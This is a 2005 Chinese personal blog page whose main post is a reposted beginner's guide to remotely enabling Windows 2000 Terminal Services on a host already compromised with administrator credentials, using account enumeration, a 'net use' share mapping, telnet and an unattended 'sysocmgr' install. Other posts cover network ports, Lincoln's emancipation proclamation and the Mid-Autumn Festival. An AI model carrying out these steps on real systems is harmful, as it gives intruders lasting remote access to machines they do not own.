黑色星期六
黑色星期六
九月,我把负担装上旅程,眼角逐渐舒展,九月,我把身影写上纸片,捎去向日葵的灵感
九月,我从乡下走出 ,水田里的禾苗绿得 耀眼,九月,我带着 尘土,一袭白衫
九月,我朝北方行去 ,每天成为习惯九月,我把落叶收集 ,背包满满
<< 2010 三月 >>
31 1 2 3 4 5 6
7 8 9 10 11 12 13
14 15 16 17 18 19 20
21 22 23 24 25 26 27
28 29 30 31 1 2 3

栏目分类
随笔 (7)
天涯 (0)
校园 (0)
娱乐 (0)
照片 (0)
音影 (2)
论文 (11)

最新日志
远程开启3389终端服务(菜鸟篇)(zt)(2005-9-22)
我对端口的理解(ZT)(2005-9-22)
《解放黑人奴隶宣言》发表日(2005-9-22)
中秋起源(2005-9-17)
不可思意的游戏(2005-9-14)
因为是女子(2005-9-14)
意大利诗人但丁逝世(2005-9-14)
天使的失误(2005-9-14)
更多>>>

最新评论
骗子嘛骗子。。。
后面出现的五张牌...(2007-4-12)
1...(2007-1-18)
大家好,我是新来的...(2007-1-16)
~~~~~~~~
给个连接啊~~~...(2006-7-3)

友情链接
COOGO论坛
西科大
西科网站
百鸣论坛
蚂蚁脚下
我是网管
猫扑
天涯博客
容树下
风急天高
永远的伊苏II

[访问计数:14353]


白色星期六 管 理 员
真之雨轩 管 理 员



远程开启3389终端服务(菜鸟篇)(zt)
2005-9-21 星期三(Wednesday) 晴

得到了一台主机的管理员权限,但我们失望的发现这台主机并没有安装3389终端服务组件,
是不是有些懊丧呢?别急,下面我们一起来探索一下远程开启3389的方法.

首先我们应该了解3389终端服务,可以运行在什么系统下,个人了解,终端服务在M$的大部分
产品中都可运行,如:winnt4/win2000server/win2000ADV-server/win2000DS/XP等.
但winnt4中是需要单独购买的,2000专业版不能远程安装终端服务的,至少我没成功过.
我们在以下的探索中,是以win2000server和高级server为例的.(现在用的也最多).


现在开始.

假设我们拿到了一个主机的管理员帐户和密码.
主机: 192.168.0.1
帐号: administrator
密码: 7788
2000系统安装在c:\winnt下


从上面的的介绍可以知道,2000专业版是不可以远程安装终端服务的,那我们就要首先来
判断此主机是专业版还是服务器版,才能进入下一个环节.

我们可以先用对方所开帐户判断:

c:\>letmein \\192.168.0.1 -all -d
stating connecting to server ...
Server local time is: 2002-1-13 10:19:22
Start get all users form server...
--------------------------
Total = 5
--------------------------
num0= Administrator ()
num1= Guest ()
num2= IUSR_servername (Internet 来宾帐号 )
num3= IWAM_servername (启动 IIS 进程帐号)
num4= TsInternetUser (TsInternetUser)
--------------------------
Total = 5
--------------------------

一般情况num2/3/4这三个帐户都是2000server默认开启的.
2000专业版默认是不开这些帐户的.

我们也可以扫描对方开放的端口进一步确认:
用扫描软件如:superscan3.exe扫描对方所开端口
判断对方是否开启25,3372等2000server默认开启的端口.

当然我们还可以使用一些工具,如:cmdinfo.zip
这2个东东可以获得本地或远程NT/2K主机的版本,系统路径,源盘路径,PACK版本,安装时间等一
系列信息,一个图形界面,一个命令行.
通过返回的信息就可以很清楚的了解对方主机情况.

还有一些其他的方法来判断,如:从对方所开的服务来确定等,
从上面的判断准确率还算高,别的就不一一说明了.


如果你在以上步骤里发现对方主机并没有那3个帐户,默认端口也没开,
或cmdinfo返回的信息对方是2000专业版,你就要放弃安装3389的计划了.


现在我们要进入下一环节:
判断终端服务到底有没有安装?

你也许要问:为什么还要判断啊?我扫描没有发现3389端口啊?
这里就需要解释一下,如果装了终端服务组件,可能有哪几种情况扫描不到3389端口?
1.终端服务termservice在"管理工具">>>"服务"中被禁用.
2.终端服务连接所需的RDP协议在"管理工具">>>"终端服务配置"中被停用连接.
3.终端服务默认连接端口3389被人为的改变.如何改变请看修改终端服务默认的3389端口(图文)
4.终端服务绑定的网络适配器不是外网的.
5.防火墙和端口过滤之类的问题.
6.....(还有我没想到的)
其实,我们遇到最多的情况就是以上5种情况.

现在开始判组件是否被安装.

先与远程主机连接,映射远程主机C盘为本地Z盘
net use z: \\192.168.0.1\c$ "7788" /user:"administrator"
命令成功完成。

然后转到Z盘,检查
Z:\Documents and Settings\All Users\「开始」菜单\程序\管理工具>
里是否有 "终端服务管理器"和"终端服务配置"的快捷方式文件
如有已安装服务组件的会有,反之,没有(98% 人为故意删的可能性较小)
我们还可以在下一步telnet到对方主机后使用终端服务自带的命令进一步的核实.

判断完毕,对方好像是没有安装终端服务组件,可以进入下一步:
telnet登陆对方主机,准备安装服务组件.

在这里,我强烈建议使用2000自带的telnet服务端登陆,
有回显,不容易出错.个人感觉使用它,一次成功的比例高很多.(呵呵~,个人理解啊!)
就算没有开,打开用完后再关掉就完了.
.abu.写的最快速登录WIN2K TELNET 服务已经把这个方法介绍的非常详细,
而且他的办法(在本机建立同名,同密码帐户),让快速实现telnet登陆成为现实.

假如我们已开启对方23端口,
telnet 192.168.0.1
输入用户名/密码
*===============================================================
欢迎使用 Microsoft Telnet 服务器。
*===============================================================
C:\>
\\成功进入!!!!

进入后,再次检查终端组件是否安装:
c:\>query user
这个工具需要安装终端服务.

这样就进一步确定了组件没有被安装.如果返回:
USERNAME SESSIONNAME ID STATE IDLE TIME LOGON TIME
>w1 console 0 运行中 . 2002-1-12 22:5
\\类似这样的信息,可能组件就已安装.

好!都清楚了,可以开始安装了.
---------------------------------------------------
C:\>dir c:\sysoc.inf /s //检查INF文件的位置
c:\WINNT\inf 的目录

2000-01-10 20:00 3,770 sysoc.inf
1 个文件 3,770 字节
-----------------------------------------------------
C:\> dir c:\sysocmgr.* /s //检查组件安装程序
c:\WINNT\system32 的目录

2000-01-10 20:00 42,768 sysocmgr.exe
1 个文件 42,768 字节
-----------------------------------------------------
c:\>echo [Components] > c:\wawa
c:\>echo TSEnable = on >> c:\wawa
//这是建立无人参与的安装参数
c:\>type c:\wawa
[Components]
TSEnable = on
//检查参数文件
------------------------------------------------------
c:\>sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\wawa /q
-----------------------------------------------------
这一条就是真正安装组件的命令.
以上这条命令没有加/R参数,主机在安装完后自动重起.
如若加了/R参数主机就不会重起.

如果一切正常的话,几分钟后对方主机将会离线,当它重新回来时,
3389终端服务就已经开启.你就可以连上去了.

问题和建议:

A 在安装过程中,不使用/R,有时主机也不会重起,你就要手动重起他,但在使用诸如:iisreset /reboot命令时,对方
的屏幕会出现个对话框,写着谁引起的这次启动,离重起还有多少秒.

B 一次不行可以再试一次,在实际中很有作用.

C 在输入sysocmgr命令开始安装时,一定不要把命令参数输错,那会在对方出现一个大的对话框,是sysocmgr的帮助,很是显眼,
而且要求确定.在你的屏幕上是不会有任何反应的,你不会知道出错,所以会有B的建议.
# posted by 白色星期六 @ 2005-09-22 04:41 评论(1)

我对端口的理解(ZT)
2005-9-22 星期四(Thursday) 晴

由于水平有限,所说的一切的准确率能达到多少实在是心中没谱,所以:
1、请高手们不吝赐教,如果俺所说的不对的地方一定帮忙指出,一来帮俺一下,二来也让看贴子的菜鸟们不要再犯和俺一样的错误;
2、希望菜鸟们看一下俺写的原文,同时仔细看一下后面高手们的回贴。

关于端口的问题,无论在哪个谈技术的论坛上都是被问的最多的问题,高手们不屑于回答关于如何屏蔽的问题,菜鸟们(包括俺自己)也没办法回答到底端口是什么,所以关于端口的问题就这么被一次又一次的提出,一次又一次的被回答,提问的人没弄明白,回答的人也没说清楚,这就是俺想写这个问题的初衷。

这篇文章的全部意实际用一句话就可以说清楚了(就是我对端口的理解):
所谓端口,就是相当于机器与外界接触的窗口,咱们要上网总要连网线吧!那是硬件的窗口,端口其实是软件的窗口,就是说一个软件如果要和外界联系,就必须打开一个端口,例如要上网浏览就必然打开了80端口;你要使用sql,就必然打开1433和1434端口!

所以:朋友们就立即知道了,1、要想打开自己的任何一个窗口,就必须是自己在使用某一个软件或者服务!如果你使用了终端服务,就必然打开了3389端口!(例外的情况下面再说,呵呵!菜鸟写东西都是这样的)
2、如果你没有使用终端服务,但是通过扫描却发现自己打开了3389端口,那只有一种情况——你被别人入侵了!

经常有网友问:我的机器如何打开某个端口和屏蔽某个端口,问题很简单:你如果没有使用某个服务或者某个软件,就不会打开什么端口。例如终端服务没打开,你就肯定没有打开3389端口(被入侵除外)。屏蔽端口就更简单了,自己下载个防火墙,全中文的,看一下帮助就知道了。这既不是俺写这篇文章的目的,也不是俺一时半会儿能说清楚的,呵呵~。

唠叨了半天,不知道俺对端口的理解是否已经完全说清楚了,这就不是俺的问题了,还是老话,请高手们不吝赐教!

下面是从别的地方找来的素材,不知道对大家加深理解端口是否有用!
1) 公认端口(Well Known Ports):从0到1023,它们紧密绑定于一些服务。通常这些端口的通讯明确表明了某种服务的协议。例如:80端口实际上总是HTTP通讯。

2) 注册端口(Registered Ports):从1024到49151。它们松散地绑定于一些服务。也就是说有许多服务绑定于这些端口,这些端口同样用于许多其它目的。例如:许多系统处理动态端口从1024左右开始。

3) 动态和/或私有端口(Dynamic and/or Private Ports):从49152到65535。理论上,不应为服务分配这些端口。实际上,机器通常从1024起分配动态端口。但也有例外:SUN的RPC端口从32768开始。
PS:个人认为简单易懂,ZT于54master
# posted by 白色星期六 @ 2005-09-22 04:37 评论(0)

《解放黑人奴隶宣言》发表日
2005-9-22 星期四(Thursday) 阴

1862年9月22日,美国第十六届总统林肯发表了《解放黑人奴隶宣言》。马克思称赞这个宣言是“联邦成立以来的美国史上最重要的文件”。
  美洲原是印第安人故乡,自从哥伦布发现“新大陆”之后,西班牙、荷兰、法国、英国等不断地向北美洲移民,并在这里建立13个殖民地。殖民者残暴地屠杀土著居民,使印第安人濒临绝种。于是他们从非洲掳掠来大批黑人充当奴隶,随着掳掠来的黑人奴隶的增多,黑奴问题成了美国一个严重的社会问题。
  林肯出生于一个农民家庭,青年时代就同情黑人农奴的悲惨遭遇。1834年他跨入政界后,多次发表关于解放黑人的演说,特别是1856年竞选副总统时,明确表示:“我们将为争取自由和废除奴隶制而斗争。”林肯解放黑奴的主张,遭到美国南部农奴主的强烈反对,却符合美国北方资产阶级的利益。在北方资产阶级的支持下,1860年林肯选为美国第十六届总统。美国南方种植园奴隶主于1861年2月组成了南方联盟。4月12日美国南北战争就此开始。由于北方资产阶级林肯政府没有充分准备,内战初期,北方失利,华盛顿几乎失守。在人民群众的推动下,1862年,林肯采取了革命性的措施。其中最有力的措施是签署了《解放黑人奴隶的宣言》,规定从1863年1月1日起,南方各州的黑奴“永远获得自由”,“可参加合众国军队”。这些措施激发了广大人民群众特别是黑人的革命积极性,很快就有50万至75万工人参加了军队,南方有50万黑人逃离种植园,在敌人后方广泛开展游击战,牵制了奴隶主的10万军队,使南方在经济上濒于崩溃。于是,战争形势急转直下。1865年4月3日,南方首都里士满被北军攻克。历时4年之久的南北战争,以北部的完全胜利而告结束。
# posted by 白色星期六 @ 2005-09-22 04:21 评论(0)

中秋起源
2005-9-17 星期六(Saturday) 晴

中秋节是我国的传统佳节。根据史籍的记载,“中秋”一词最早出现在《周礼》一书中。到魏晋时,有“谕尚书镇牛淆,中秋夕与左右微服泛江”的记载。直到唐朝初年,中秋节才成为固定的节日。《唐书·太宗记》记载有“八月十五中秋节”。中秋节的盛行始于宋朝,至明清时,已与元旦齐名,成为我国的主要节日之一。这也是我国仅次于春节的第二大传统节日。

根据我国的历法,农历八月在秋季中间,为秋季的第二个月,称为“仲秋”,而八月十五又在“仲秋”之中,所以称“中秋”。中秋节有许多别称:因节期在八月十五,所以称“八月节”、“八月半”。因中秋节的主要活动都是围绕“月”进行的,所以又俗称“月节”、“月夕”。中秋节月亮圆满,象征团圆,因而又叫“团圆节”。在唐朝,中秋节还被称为“端正月”。中秋晚上,我国大部分地区还有烙“团圆”的习俗,类似于现在的月饼。

 任芳

(来源:山西日报 网络编辑:张清兰)
# posted by 白色星期六 @ 2005-09-17 13:31 评论(0)

不可思意的游戏
2005-9-14 星期三(Wednesday) 晴


# posted by 白色星期六 @ 2005-09-14 12:27 评论(2)


页码:1/4  [1][2][3][4]   

本站域名:http://coogo.blog.tianya.cn/